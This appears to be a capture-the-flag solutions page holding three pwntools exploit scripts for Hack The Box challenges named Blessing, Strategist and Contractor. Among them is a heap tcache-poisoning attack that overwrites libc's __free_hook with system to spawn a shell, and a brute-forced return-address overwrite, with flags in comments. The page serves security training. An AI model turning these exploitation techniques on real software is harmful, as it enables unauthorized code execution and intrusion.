dplastico

Blessing

#!/usr/bin/env python3

from pwn import *

elf = ELF("./blessing_patched")   # challenge binary used for local runs and symbol lookups

context.binary = elf   # pwntools takes arch/bits (for p64/u64, etc.) from the binary
context.terminal = ['tmux', 'splitw', '-hp', '70']   # pane that gdb.debug() opens in
libc = elf.libc        # libc the binary resolves against, as located by pwntools
#context.log_level = "debug"
# gdb script handed to gdb.debug() by start() when run with GDB=1
gs = '''
b *main + 353
continue
'''

def start():
    """Return a tube to the target.

    Selected by pwntools command-line flags: ``REMOTE`` connects to the
    challenge host, ``GDB`` launches the binary under gdb with ``gs`` as
    the gdb script, otherwise a plain local process is spawned.
    """
    if args.REMOTE:
        return remote("83.136.248.131", 52424)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)

r = start()

def rcu(d1, d2=0):
    """Discard input up to and including *d1*.

    When *d2* is given (truthy), additionally read up to *d2* and return
    the bytes in between (with *d2* dropped); otherwise return None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log the current libc base address."""
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* in hex, labelled with *name*."""
    return log.info(name + (" = %#x" % val))


def sa(delim, data):
    """Send *data* (no newline) once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* followed by a newline once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* followed by a newline."""
    return r.sendline(line)


def bc(value):
    """Return str(*value*) encoded as ASCII bytes."""
    return str(value).encode('ascii')


def demangle_base(value):
    """Shift *value* left by 12 bits (multiply by 0x1000)."""
    return value << 0xc


def remangle(heap_base, value):
    """XOR *value* with *heap_base* shifted right by 12 bits."""
    return (heap_base >> 0xc) ^ value

#========= exploit here ===================

# Parse the hex value printed after "Please accept this: "; the second
# delimiter is the backspace/space sequence the program prints right after it.
leak = int(rcu(b"Please accept this: ", b"\x08 \x08\x08 \x08\x08"),16)
logleak("value location", leak)

# The length answered back is the leaked value plus one.
size = leak + 1
sla(b"Give me the song's length:", bc(size))

payload = b"BBBBBBBB"

sl(payload)

#========= interactive ====================
r.interactive()   # hand the tube over to the user
#HTB{3v3ryth1ng_l00k5_345y_w1th_l34k5_9d18ac4b8d55c5fd8673bff7b39ef794}

Strategist

#!/usr/bin/env python3

from pwn import *

elf = ELF("./strategist_patched")   # challenge binary used for local runs and symbol lookups

context.binary = elf   # pwntools takes arch/bits (for p64/u64, etc.) from the binary
context.terminal = ['tmux', 'splitw', '-hp', '70']   # pane that gdb.debug() opens in
#context.log_level = "debug"

libc = elf.libc   # libc the binary resolves against, as located by pwntools
# gdb script handed to gdb.debug() by start() when run with GDB=1
gs = '''
continue
'''

def one_gadget(filename, base_addr=0):
    """Return the offsets reported by the external ``one_gadget`` tool for
    *filename*, each rebased by *base_addr*.

    Runs ``one_gadget --raw -l1 FILE`` and parses its space-separated
    decimal output; raises if the tool is missing or exits non-zero.
    """
    raw = subprocess.check_output(['one_gadget', '--raw', '-l1', filename])
    fields = raw.decode().split(' ')
    return [int(field) + base_addr for field in fields]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    """Return a tube to the target.

    Selected by pwntools command-line flags: ``REMOTE`` connects to the
    challenge host, ``GDB`` launches the binary under gdb with ``gs`` as
    the gdb script, otherwise a plain local process is spawned.
    """
    if args.REMOTE:
        return remote("83.136.254.165", 37103)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)

r = start()

def rcu(d1, d2=0):
    """Discard input up to and including *d1*.

    When *d2* is given (truthy), additionally read up to *d2* and return
    the bytes in between (with *d2* dropped); otherwise return None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log the current libc base address."""
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* in hex, labelled with *name*."""
    return log.info(name + (" = %#x" % val))


def sa(delim, data):
    """Send *data* (no newline) once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* followed by a newline once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* followed by a newline."""
    return r.sendline(line)


def bc(value):
    """Return str(*value*) encoded as ASCII bytes."""
    return str(value).encode('ascii')


def demangle_base(value):
    """Shift *value* left by 12 bits (multiply by 0x1000)."""
    return value << 0xc


def remangle(heap_base, value):
    """XOR *value* with *heap_base* shifted right by 12 bits."""
    return (heap_base >> 0xc) ^ value

idx = 0
def create(size, data):
    """Menu option 1: create a plan of *size* bytes holding *data*.

    Answers the two following ``>`` prompts (size as decimal text, then the
    raw data without a newline) and finally consumes the next prompt so the
    tube is positioned at the menu again.  Returns None.
    """
    prompt = b">"
    sl(b"1")
    size_text = bc(size)
    sla(prompt, size_text)
    sa(prompt, data)
    rcu(prompt)

def edit(idx, data):
    """Menu option 3: overwrite plan *idx* with *data* (sent without a
    newline), then consume the following prompt.  Returns None."""
    prompt = b">"
    sl(b"3")
    sla(prompt, bc(idx))
    sa(prompt, data)
    rcu(prompt)

def delete(idx):
    """Menu option 4: delete plan *idx*, then consume the following prompt.
    Returns None."""
    prompt = b">"
    sl(b"4")
    sla(prompt, bc(idx))
    rcu(prompt)

def leak(idx):
    """Menu option 2: show plan *idx* and return its contents as an integer.

    Reads the line following "[Sir Alaric]: Plan ", takes the field after
    the first "]: " separator in that line, right-pads it with NUL bytes to
    8 bytes and unpacks it little-endian with u64.  Consumes the next prompt
    before returning.
    """
    sl(b"2")
    sla(b">", bc(idx))
    rcu(b"[Sir Alaric]: Plan ")
    line = rcu(b"]: ", b"\n")
    field = line.split(b"]: ")[1]
    value = u64(field.ljust(8, b"\x00"))
    rcu(b">")
    return value
#========= exploit here ===================
r.timeout = 1   # cap each recv so a missing prompt raises instead of blocking forever
rcu(b">")       # consume the first menu prompt

# Trailing comments give the plan slot each call is expected to land in.
create(0x428, b"leak") #0
create(0x38, b"A"*0x38) #1
create(0x38, b"B") #2
create(0x38, b"C") #3

create(0x18, b"/bin/sh") #4
delete(0)
create(0x428, b"A") #0?

# Reads slot 0 back via menu option 2.  NOTE: this rebinds `leak` from the
# helper function to its integer result, so leak() cannot be called again below.
leak = leak(0)
logleak("libc leak", leak)

# Constant distance from the leaked value to the libc base; specific to the
# libc this challenge ships with — verify against the bundled file before reuse.
libc.address = leak-0x3ebc41
libcbase()

# Writes 0x39 bytes into slot 1, which was created with size 0x38.
edit(1, b"A"*0x38+p8(0x81))
delete(1)
delete(2)
delete(3)

create(0x78, b"A"*0x40+p64(libc.sym.__free_hook)) #1?
create(0x38, b"X")

create(0x38, p64(libc.sym.system))

delete(4)
#========= interactive ====================
r.interactive()   # hand the tube over to the user
#HTB{0ld_r3l14bl3_l1bc_st1ll_3x15t5_1ab691e1261885df1a8bed25c7a49008}

Contractor

#!/usr/bin/env python3

from pwn import *

elf = ELF("./contractor_patched")   # challenge binary used for local runs and symbol lookups

context.binary = elf   # pwntools takes arch/bits (for p64/u64, etc.) from the binary
context.terminal = ['tmux', 'splitw', '-hp', '70']   # pane that gdb.debug() opens in
#context.log_level = "debug"
libc = elf.libc   # libc the binary resolves against, as located by pwntools

# gdb script handed to gdb.debug() by start() when run with GDB=1
gs = '''
b *main + 1366
c
'''

def one_gadget(filename, base_addr=0):
    """Return the offsets reported by the external ``one_gadget`` tool for
    *filename*, each rebased by *base_addr*.

    Runs ``one_gadget --raw -l1 FILE`` and parses its space-separated
    decimal output; raises if the tool is missing or exits non-zero.
    """
    raw = subprocess.check_output(['one_gadget', '--raw', '-l1', filename])
    fields = raw.decode().split(' ')
    return [int(field) + base_addr for field in fields]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    """Return a tube to the target.

    Selected by pwntools command-line flags: ``REMOTE`` connects to the
    configured host/port, ``GDB`` launches the binary under gdb with ``gs``
    as the gdb script, otherwise a plain local process is spawned.
    """
    if args.REMOTE:
        return remote("127.0.0.1", 1337)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)


r = start()

def rcu(d1, d2=0):
    """Discard input up to and including *d1*.

    When *d2* is given (truthy), additionally read up to *d2* and return
    the bytes in between (with *d2* dropped); otherwise return None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log the current libc base address."""
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* in hex, labelled with *name*."""
    return log.info(name + (" = %#x" % val))


def sa(delim, data):
    """Send *data* (no newline) once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* followed by a newline once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* followed by a newline."""
    return r.sendline(line)


def bc(value):
    """Return str(*value*) encoded as ASCII bytes."""
    return str(value).encode('ascii')


def demangle_base(value):
    """Shift *value* left by 12 bits (multiply by 0x1000)."""
    return value << 0xc


def remangle(heap_base, value):
    """XOR *value* with *heap_base* shifted right by 12 bits."""
    return (heap_base >> 0xc) ^ value

#========= exploit here ===================


attemp = 0   # only incremented on KeyboardInterrupt (see below); never read afterwards

# Retry loop: each iteration starts a fresh local process.  The helper
# functions above look up the global `r` at call time, so rebinding it here
# points them at the new process.
for i in range(16):
    r = process([elf.path])
    #r = remote("94.237.58.202", 33308)
    r.timeout = 0.5   # short recv timeout so an attempt that stalls fails quickly
    try:

        name = b"X"*8
        sla(b">", name)
        reason = "Y"*0x8   # str rather than bytes; pwntools encodes it on send
        sla(b">", reason)
        age = 0x1337
        sla(b">", bc(age))
        #leak
        payload = b"A"*0x10
        sla(b">", payload)
        # Bytes echoed after the 16 'A's, NUL-padded to 8 and unpacked little-endian.
        leak = u64(rcu(b"[Specialty]: AAAAAAAAAAAAAAAA", b"\n").ljust(8, b"\x00"))
        logleak("leak", leak)
        # Rebase the binary from the leak; 0x1b50 is presumably the leak's offset
        # inside the binary — confirm against this build before reuse.
        elf.address = leak - 0x1b50
        payload = b"\xf0"*0x18
        payload += p64(0xdeadbeef)
        payload += p8(0x60)
        sla(">", b"4")   # str delimiter here, bytes elsewhere; pwntools accepts both
        sla(b"at: ",payload)
        #
        sla(b">", b"yes")
        #
        sla(b">", b"4")
        payload = p64(elf.sym.contract)
        #
        sla(b"at: ",payload)
        r.recvuntil(b"lad!\n\n")
        sl(b"ls")
        if b"flag.txt" in r.recv():
            r.interactive()   # returns to the loop afterwards; remaining iterations still run
        else:
            # BUG: `log.failue` is a typo for `log.failure`; the AttributeError it
            # raises is swallowed by the bare `except:` below, so a miss is never logged.
            log.failue(f"Fail!")

    except KeyboardInterrupt:
        attemp +=1
        log.failure(f"Attemp #{i}")
        r.close()
    except:
        # Swallows every other error (EOFError, recv timeouts, the typo above).
        # The process started for this attempt is not closed on this path.
        pass

#========= interactive ====================